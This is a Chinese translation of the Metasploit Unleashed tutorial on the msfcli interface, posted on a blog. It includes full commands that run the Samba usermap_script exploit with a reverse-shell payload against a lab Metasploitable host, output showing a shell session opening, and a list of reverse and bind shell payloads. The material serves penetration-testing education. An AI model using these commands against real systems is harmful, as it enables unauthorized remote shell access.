第四期_Metasploit 基础(一)msfcli《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》

已于 2022-02-04 18:42:36 修改
阅读量549 收藏 2
点赞数 1
分类专栏: Metasploit Unleashed文档 文章标签: 安全 网络安全 web安全
于 2022-02-04 18:27:29 首次发布
原文链接:https://www.offensive-security.com/metasploit-unleashed/
版权

翻译者说明1:本文为Metasploit Unleashed中文版翻译。原文链接:https://www.offensive-security.com/metasploit-unleashed/

翻译者说明2:为减轻翻译负担采用了机器翻译,翻译者从中人工剔除了机翻错误或歧义的问题,但难免会存在小问题,请读者见谅。如发现文章翻译存在问题,可在文章下方评论留言。

翻译者说明3:如果你喜欢这篇翻译,请给关注一下我并给文章点个赞,你的支持是给我工作的最大鼓励。

翻译者说明4:其他章节一并整合在专栏中,如有兴趣可关注专栏了解更多内容。

四、METASPLOIT 基础

在学习如何使用Metasploit时,您会发现有许多不同的界面可用于此黑客工具,每个界面都有自己的优点和缺点。因此,没有一个完美的界面可以与Metasploit控制台一起使用,尽管MSFConsole是访问大多数Metasploit命令的唯一受支持方式。但是,对所有 Metasploit 接口感到满意仍然是有益的。
MSFConsole 接口示例
下一个Metasploit Tutorial将概述各种接口,以及一些最佳利用每个接口的讨论。

1. MSFCLI

a)什么是 MSFCLI?

msfcli 为框架提供了强大的命令行界面。这使您可以轻松地将Metasploit漏洞添加到您可能创建的任何脚本中。

注意:截至 2015-06-18 msfcli 已被删除。通过 msfconsole 获得类似功能的一种方法是使用 -x
选项。例如,以下命令设置 samba/usermap_script的所有选项,并针对目标运行该选项:

root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"

b)命令行界面命令

运行 msfcli 帮助命令:

root@kali:~# msfcli -h
Usage: /usr/bin/msfcli<option=value> [mode]
===========================================================

    Mode           Description
    ----           -----------
    (A)dvanced     Show available advanced options for this module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module
    (H)elp         You're looking at it baby!
    (I)DS Evasion  Show available ids evasion options for this module
    (O)ptions      Show available options for this module
    (P)ayloads     Show available payloads for this module
    (S)ummary      Show information about this module
    (T)argets      Show available targets for this exploit module

Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E

注意:使用 msfcli 时,使用"等于"运算符 = 分配变量,并且所有选项都区分大小写。

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)

RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

如果您不完全确定哪些选项属于特定模块,则可以在卡住的任何一点将字母 O 附加到字符串的末尾。

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

若要显示当前模块的可用负载,请将字母 P 追加到 msfcli 命令行字符串。

root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Compatible payloads
===================

   Name                                Description
   ----                                -----------
   cmd/unix/bind_awk                   Listen for a connection and spawn a command shell via GNU AWK
   cmd/unix/bind_inetd                 Listen for a connection and spawn a command shell (persistent)
   cmd/unix/bind_lua                   Listen for a connection and spawn a command shell via Lua
   cmd/unix/bind_netcat                Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_netcat_gaping         Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_netcat_gaping_ipv6    Listen for a connection and spawn a command shell via netcat
   cmd/unix/bind_perl                  Listen for a connection and spawn a command shell via perl
   cmd/unix/bind_perl_ipv6             Listen for a connection and spawn a command shell via perl
   cmd/unix/bind_ruby                  Continually listen for a connection and spawn a command shell via Ruby
   cmd/unix/bind_ruby_ipv6             Continually listen for a connection and spawn a command shell via Ruby
   cmd/unix/bind_zsh                   
        Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
        often available, please be aware it isn't usually installed by default.
      
   cmd/unix/generic                    Executes the supplied command
   cmd/unix/reverse                    Creates an interactive shell through two inbound connections
   cmd/unix/reverse_awk                Creates an interactive shell via GNU AWK
   cmd/unix/reverse_lua                Creates an interactive shell via Lua
   cmd/unix/reverse_netcat             Creates an interactive shell via netcat
   cmd/unix/reverse_netcat_gaping      Creates an interactive shell via netcat
   cmd/unix/reverse_openssl            Creates an interactive shell through two inbound connections
   cmd/unix/reverse_perl               Creates an interactive shell via perl
   cmd/unix/reverse_perl_ssl           Creates an interactive shell via perl, uses SSL
   cmd/unix/reverse_php_ssl            Creates an interactive shell via php, uses SSL
   cmd/unix/reverse_python             Connect back and create a command shell via Python
   cmd/unix/reverse_python_ssl         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
   cmd/unix/reverse_ruby               Connect back and create a command shell via Ruby
   cmd/unix/reverse_ruby_ssl           Connect back and create a command shell via Ruby, uses SSL
   cmd/unix/reverse_ssl_double_telnet  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
   cmd/unix/reverse_zsh                
        Connect back and create a command shell via Zsh.  Note: Although Zsh is often
        available, please be aware it isn't usually installed by default.

MSFcli 接口的优势

  • 支持启动漏洞利用和辅助模块
  • 对特定任务有用
  • 适合学习
  • 在测试或开发新漏洞时使用方便
  • 一次性利用的好工具
  • 如果您确切地知道需要哪些漏洞和选项,那就太好了
  • 非常适合在脚本和基本自动化中使用

msfcli 唯一真正的缺点是它不像 msfconsole 那样受到支持,并且一次只能处理一个 shell,这使得它对于客户端攻击来说是相当不切实际的。它也不支持msfconsole

Sno_W_olF
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
Mastering Metasploit Framework
Kali学习 | 漏洞利用:4.3 控制Metasploit 命令行接口 MSFCLI
qq_43233085的博客
12-28 524
Kali学习 | 漏洞利用:4.3 控制Metasploit 命令行接口 MSFCLIMSFCLI 介绍MSFCLI 使用使用MSFCLI演示渗透攻击 MSFCLI 介绍 为了完成Metasploit的攻击任务,需要使用一个接口。MSFCLI刚好实现这个功能。 为了学习Metasploit 或测试/写一个新的渗透攻击,MSFCLI是一个很好的接口。 MSF命令行和MSF终端为Metasploit框...
Kali-linux使用Metasploit基础
2301_77162959的博客
05-16 912
Metasploit是一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口、选项、变量和模块所震撼,而感觉无所适从。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等。本节将介绍Metasploit下各种接口的使用方法。
Msfconsole详细教程
最新发布
weixin_65582330的博客
03-05 1705
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。选择架构平台:x86 | x64 | x86_64Platforms:windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe。
msfcli: 未找到命令
gRpc的博客
08-24 316
msfcli msfconsole
metaspolit 安装后无法启动命令行msfcli的解决方法
earthfans的专栏
07-10 4897
1246  sudo bundle install  1253  sudo apt-get install postgresql  1261  ./msfcli  1262  sudo bundle install  1263  sudo gem install bcrypt  1264  gem list  1265  gem install mkmf  1266  sudo
Metasploit(三)--Msfcli命令
weixin_33701294的博客
08-27 260
原文:《metasploit the pentration tester’s guide》msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号被弃用了root@xxoo:~# msfcli -hUsage: /opt/metasploit/msf3/msfcli <exploit_name> <option=va...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
07-SCADA_Metasploit_Modules.xlsx
10-10
Metasploit中工控设备的攻击模块清单
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
用于渗透测试、漏洞开发和漏洞恢复的Metasploit工具包
metasploit-lowlevel_metasploit_
10-02
for hackers who want to learn the act of exploitation
msfcli 不能使用,在新版metasploit不再有效
Smile in a sunny day
11-20 8568
原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploit Hi, 大家好,      这个一月份,我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。      取代
Metasploit详细教程
Kali与编程
03-24 2122
Metasploit是一种功能强大的漏洞利用工具集,帮助用户测试网络安全并确认可能的漏洞。您可以从Metasploit官方网站下载适用于您操作系统的Metasploit框架。在成功启动Metasploit后,您需要查找目标设备并确定其IP地址、端口号和运行的服务。在选择漏洞后,您需要选择一个可用的模块以利用该漏洞。在选择了模块后,您需要设置所需的参数。该命令将扫描指定IP地址的所有开放端口,并识别运行的服务。该命令将列出所有与Apache相关的已知漏洞。该命令将显示所有可用选项,并允许您设置值。
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
m0_74131821的博客
05-27 2292
Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
metasploit常用命令
Johnathan的博客
03-03 514
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
Metasploit使用教程
Kali与编程
03-23 1789
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
演示使用Metasploit入侵Windows
weixin_34001430的博客
04-25 920
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 ...
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
Metasploit使用教程(操作实例,meterpreter,msfconsole,msfcli,抓包)
qq_44111753的博客
12-13 5914
1、控制Metasploit终端(MSFCONSOLE) MSFCONSOLE主要用于管理Metasploit数据库,管理会话,配置并启动Matasploit模块 一些通用命令: help:该命令允许用户查看执行命令的帮助信息 use module:该命令允许用户加载选择的模块 set optionname module:该命令允许用户为模块设置不同的选项。 run:该命令用来启动一个非渗透攻击模块 search module:该命令允许用户搜索一个特定的模块 exit:退出MSFCONSOLE 操作步骤:
Linux上用metasploit使用mysql_version模块怎么操作
05-26
使用 Metasploit 的 mysql_version 模块可以帮助你获取目标主机上正在运行的 MySQL 版本信息。下面是在 Linux 上使用 Metasploit 的 mysql_version 模块的步骤: 1. 打开终端并启动 Metasploit 控制台:`msfconsole...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值